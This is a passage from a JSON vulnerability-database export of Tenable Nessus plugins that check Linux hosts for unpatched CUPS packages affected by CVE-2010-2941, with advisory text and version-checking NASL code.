pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"cups-ppdc\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"cupsddk\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcups2\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcups2-dev\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupscgi1\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupscgi1-dev\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsdriver1\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsdriver1-dev\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsimage2\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsimage2-dev\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsmime1\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsmime1-dev\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsppdc1\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsppdc1-dev\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-bsd / cups-client / cups-common / cups-dbg / cups-ppdc / etc\");\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:22", "bulletinFamily": "scanner", "description": "According to its banner, the version of CUPS installed on the remote\nhost is prior to 1.4.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A use-after-free error exists due to improper allocation\n of memory for attribute values with invalid string data\n types. A remote attacker can exploit this, via a crafted\n IPP request, to cause a denial of service condition or\n the execution of arbitrary code. (CVE-2010-2941)\n\n - An overflow condition exists in the PPD compiler due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to dereference already freed\n memory, resulting in the execution of arbitrary code.", "modified": "2019-01-02T00:00:00", "published": "2010-11-30T00:00:00", "id": "CUPS_1_4_5.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50844", "title": "CUPS < 1.4.5 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50844);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/01/02 11:18:37\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_bugtraq_id(44530);\n\n script_name(english:\"CUPS < 1.4.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks CUPS server version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote print service is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of CUPS installed on the remote\nhost is prior to 1.4.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A use-after-free error exists due to improper allocation\n of memory for attribute values with invalid string data\n types. A remote attacker can exploit this, via a crafted\n IPP request, to cause a denial of service condition or\n the execution of arbitrary code. (CVE-2010-2941)\n\n - An overflow condition exists in the PPD compiler due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to dereference already freed\n memory, resulting in the execution of arbitrary code.\n\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=624438\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.cups.org/blog/2010-11-11-cups-1.4.5.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to CUPS version 1.4.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/30\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:cups\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"cups_1_3_5.nasl\");\n script_require_keys(\"www/cups\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 631);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:631, embedded:TRUE);\nget_kb_item_or_exit(\"www/\"+port+\"/cups/running\");\n\nversion = get_kb_item_or_exit(\"cups/\"+port+\"/version\");\nsource = get_kb_item_or_exit(\"cups/\"+port+\"/source\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n version =~ \"^1\\.([0-3]|4\\.[0-4])($|[^0-9])\" ||\n version =~ \"^1\\.4(rc|b)\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.4.5\\n';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse if (version =~ \"^(1|1\\.4)($|[^0-9.])\") audit(AUDIT_VER_NOT_GRANULAR, \"CUPS\", port, version);\nelse audit(AUDIT_LISTEN_NOT_VULN, \"CUPS\", port, version);\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:14:22", "bulletinFamily": "scanner", "description": "An invalid free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server. (CVE-2010-2941)\n\nAfter installing this update, the cupsd daemon will be restarted\nautomatically.", "modified": "2019-01-02T00:00:00", "published": "2012-08-01T00:00:00", "id": "SL_20101110_CUPS_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60888", "title": "Scientific Linux Security Update : cups on SL6.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60888);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/01/02 10:36:43\");\n\n script_cve_id(\"CVE-2010-2941\");\n\n script_name(english:\"Scientific Linux Security Update : cups on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An invalid free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server. (CVE-2010-2941)\n\nAfter installing this update, the cupsd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1103&L=scientific-linux-errata&T=0&P=2832\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1b5ffce5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"cups-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-devel-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-libs-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-lpd-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-php-1.4.2-35.el6_0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:21", "bulletinFamily": "scanner", "description": "Updated cups packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe Common UNIX Printing System (CUPS) provides a portable printing\nlayer for UNIX operating systems.\n\nAn invalid free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server. (CVE-2010-2941)\n\nRed Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\nreporting this issue.\n\nUsers of cups are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing\nthis update, the cupsd daemon will be restarted automatically.", "modified": "2018-11-28T00:00:00", "published": "2010-11-18T00:00:00", "id": "REDHAT-RHSA-2010-0866.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50638", "title": "RHEL 6 : cups (RHSA-2010:0866)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0866. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50638);\n script_version (\"1.13\");\n script_cvs_date(\"Date: 2018/11/28 11:42:05\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_xref(name:\"RHSA\", value:\"2010:0866\");\n\n script_name(english:\"RHEL 6 : cups (RHSA-2010:0866)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated cups packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe Common UNIX Printing System (CUPS) provides a portable printing\nlayer for UNIX operating systems.\n\nAn invalid free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server. (CVE-2010-2941)\n\nRed Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\nreporting this issue.\n\nUsers of cups are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2941\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0866\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0866\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"cups-debuginfo-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"cups-devel-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"cups-libs-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-lpd-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-lpd-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-lpd-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-php-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-php-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-php-1.4.2-35.el6_0.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-debuginfo / cups-devel / cups-libs / cups-lpd / etc\");\n }\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:20", "bulletinFamily": "scanner", "description": "This update fixes a cupsd memory corruption vulnerability\n(CVE-2010-2941), as well as fixing a crash when the MIME database\ncannot be loaded for any reason.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2018-07-12T00:00:00", "published": "2010-11-17T00:00:00", "id": "FEDORA_2010-17641.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50618", "title": "Fedora 14 : cups-1.4.4-11.fc14 (2010-17641)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-17641.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50618);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/12 15:01:51\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_bugtraq_id(44530);\n script_xref(name:\"FEDORA\", value:\"2010-17641\");\n\n script_name(english:\"Fedora 14 : cups-1.4.4-11.fc14 (2010-17641)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a cupsd memory corruption vulnerability\n(CVE-2010-2941), as well as fixing a crash when the MIME database\ncannot be loaded for any reason.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=624438\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-November/050977.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d9e9c6d0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"cups-1.4.4-11.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:16:40", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2010:0866 :\n\nUpdated cups packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe Common UNIX Printing System (CUPS) provides a portable printing\nlayer for UNIX operating systems.\n\nAn invalid free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server. (CVE-2010-2941)\n\nRed Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\nreporting this issue.\n\nUsers of cups are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing\nthis update, the cupsd daemon will be restarted automatically.", "modified": "2018-08-13T00:00:00", "published": "2013-07-12T00:00:00", "id": "ORACLELINUX_ELSA-2010-0866.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68140", "title": "Oracle Linux 6 : cups (ELSA-2010-0866)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2010:0866 and \n# Oracle Linux Security Advisory ELSA-2010-0866 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68140);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/08/13 14:32:37\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_xref(name:\"RHSA\", value:\"2010:0866\");\n\n script_name(english:\"Oracle Linux 6 : cups (ELSA-2010-0866)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2010:0866 :\n\nUpdated cups packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe Common UNIX Printing System (CUPS) provides a portable printing\nlayer for UNIX operating systems.\n\nAn invalid free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server. (CVE-2010-2941)\n\nRed Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\nreporting this issue.\n\nUsers of cups are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-February/001838.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif 